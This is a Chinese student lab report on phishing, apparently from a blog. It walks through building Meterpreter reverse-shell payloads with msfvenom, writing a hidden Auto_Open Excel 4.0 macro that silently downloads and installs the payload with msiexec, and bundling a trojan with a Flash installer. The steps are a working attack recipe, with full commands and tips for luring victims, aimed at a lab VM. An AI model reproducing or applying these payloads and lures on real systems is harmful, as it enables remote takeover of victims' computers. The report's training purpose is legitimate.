社会工程学技术

一、实验目的

学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理。

二、实验任务

(1)制作恶意的excel文件

(2)将正常的软件和恶意木马进行捆绑打包

三、实验过程和实验结果

(一)excel宏

1. msf生成恶意的msi文件

msfvenom -p windows/meterpreter/reverse_tcp lhsot=192.168.118.129 lport=4444 -f msi -o diaoyexl.msi

2.msf建立监听

3. python在具有恶意的msi的文件夹下开启http服务

4. 开始制作excel

(1)在文件中加点内容,让受害者更容易上钩

(2)选择插入宏表

(3)第一行输入 =EXEC("msiexec /q /i http://192.168.118.129/diaoyexl.msi"),调用服务器上的msi;

第二行输入 =HALT(),标识Excel 4.0宏结束;

在A1 左上角改成Auto_Open让exl打开时候自动运行宏,然后回车,然后隐藏宏。

(4)另存为启用宏的工作表,运行后启用宏

5.输入shell,成功上线。

(二)常规软件捆绑远控木马进行钓鱼

1. 制作msf木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.129 LPORT=4444 -f exe -o flash.exe

2. 把木马和正常的flash 进行压缩放在一起用winrar添加到压缩文件

 

3. 启动msf进行监听

4. 把做好的恶意flash放到win7虚拟机中运行,点击安装后就会上线了。

5.成功执行命令

四、实验总结

实验原理: 本次实验主要基于钓鱼攻击的原理,通过制作恶意的Excel文件和软件捆绑木马,诱使受害者执行恶意代码,从而实现对受害者计算机的远程控制。实验中使用了Metasploit框架生成恶意载荷,并通过宏和软件捆绑的方式将恶意代码植入到正常文件

通过本次实验,我掌握了msfvenom生成恶意载荷的方法、制作带有恶意宏的Excel文件、将恶意载荷与正常软件捆绑,制作钓鱼样本、使用Metasploit进行监听和远程控制;学习了钓鱼攻击的原理和危害、宏病毒的工作机制、软件捆绑木马的制作和传播方式。

在实验过程中,碰到了以下问题:

1.在把木马和正常的flash 进行压缩后,在win7总是显示找不到该文件,经多次询问同学后,终于解决该问题。

2. 启动msf进行监听时的监听端口与前面不一致,多次检查后,找出问题所在并修改。

本次实验让我了解到钓鱼攻击的原理和防范措施,我们要提高网络安全意识,不轻易打开来源不明的文件和软件,防止受到钓鱼攻击;同时也要加强网络安全防护,定期更新操作系统和软件,防止恶意代码的植入。

  • 13
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值